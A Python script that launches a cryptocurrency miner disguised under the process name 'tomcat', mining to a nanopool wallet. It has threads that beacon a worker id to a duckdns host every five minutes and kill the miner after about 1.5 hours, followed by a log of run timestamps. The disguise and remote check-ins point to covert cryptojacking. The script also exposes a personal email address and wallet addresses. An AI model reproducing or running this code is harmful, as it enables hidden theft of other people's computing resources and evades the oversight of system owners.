import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:04.366443
#2018-02-17 16:49:04.150072
#2018-02-17 18:37:05.603822
#2018-02-17 20:24:05.437973
#2018-02-17 22:12:05.499765
#2018-02-17 23:56:04.673652
#2018-02-18 01:47:05.362265
#2018-02-18 03:34:06.688176
#2018-02-18 05:22:05.824858
#2018-02-18 07:14:04.672280
#2018-02-18 09:02:07.156739
#2018-02-18 10:49:02.258656
#2018-02-18 12:33:06.218158
#2018-02-18 14:20:07.548393
#2018-02-18 16:11:05.657691
#2018-02-18 17:59:01.599102
#2018-02-18 19:46:04.302677
#2018-02-18 21:33:04.350729
#2018-02-18 23:22:06.700348
#2018-02-19 01:09:01.360806
#2018-02-19 02:55:06.660072
#2018-02-19 04:44:01.766255
#2018-02-19 06:28:01.492149
#2018-02-19 08:18:08.175266
#2018-02-19 10:07:03.911821
#2018-02-19 11:56:01.894907
#2018-02-19 13:43:03.838486
#2018-02-19 15:32:04.715993
#2018-02-19 17:21:04.622384
#2018-02-19 19:08:05.732571
#2018-02-19 20:54:06.029936
#2018-02-19 22:43:04.007253
#2018-02-20 00:28:02.140565
#2018-02-20 02:16:06.257424
#2018-02-20 04:07:06.557923
#2018-02-20 05:51:01.732883
#2018-02-20 07:36:07.180023
#2018-02-20 09:21:03.796894
#2018-02-20 11:05:08.891104
#2018-02-20 12:52:05.728810
#2018-02-20 14:37:01.813876
#2018-02-20 16:21:01.430511
#2018-02-20 18:07:08.432276
#2018-02-20 19:57:04.965607
#2018-02-20 21:46:06.277417
#2018-02-20 23:28:03.139270
#2018-02-21 01:13:02.084399
#2018-02-21 02:59:04.840318
#2018-02-21 04:47:04.629659
#2018-02-21 06:37:01.884455
#2018-02-21 08:23:05.813401
#2018-02-21 10:09:04.080283
#2018-02-21 11:57:01.405016
#2018-02-21 13:47:07.005552
#2018-02-21 15:32:10.146184
#2018-02-21 17:21:05.297368
#2018-02-21 19:10:09.831974
#2018-02-21 20:57:03.956073
#2018-02-21 22:45:10.588621
#2018-02-22 00:35:11.235316
#2018-02-22 02:22:03.783815
#2018-02-22 04:10:04.197263
#2018-02-22 05:54:06.349656
#2018-02-22 07:40:09.430951
#2018-02-22 09:28:07.322095
#2018-02-22 11:13:07.108851
#2018-02-22 12:58:08.161001
#2018-02-22 14:46:04.287099
#2018-02-22 16:32:01.351010
#2018-02-22 18:17:08.859003
#2018-02-22 20:09:02.178796
#2018-02-22 21:57:01.606330
#2018-02-22 23:46:04.352110
#2018-02-23 01:33:04.352180
#2018-02-23 03:20:07.199082
#2018-02-23 05:07:07.258166
#2018-02-23 06:53:01.795538
#2018-02-23 08:43:04.056481
#2018-02-23 10:59:01.547563
#2018-02-23 12:54:10.313432
#2018-02-23 14:38:06.900233
#2018-02-23 16:28:06.519833
#2018-02-23 18:14:08.040392
#2018-02-23 19:59:05.099508
#2018-02-23 21:42:03.717194
#2018-02-23 23:34:01.942584
#2018-02-24 01:22:05.063177
#2018-02-24 03:14:07.857216
#2018-02-24 05:00:01.607741
#2018-02-24 06:50:05.745424
#2018-02-24 08:33:04.962562
#2018-02-24 10:21:03.476789
#2018-02-24 12:16:07.674073
#2018-02-24 14:08:05.192911
#2018-02-24 15:56:02.725339
#2018-02-24 17:48:05.374248
#2018-02-24 19:37:01.295414
#2018-02-24 21:24:05.450275
#2018-02-25 01:11:03.430623
#2018-02-25 04:53:05.325939
#2018-02-25 08:18:01.776073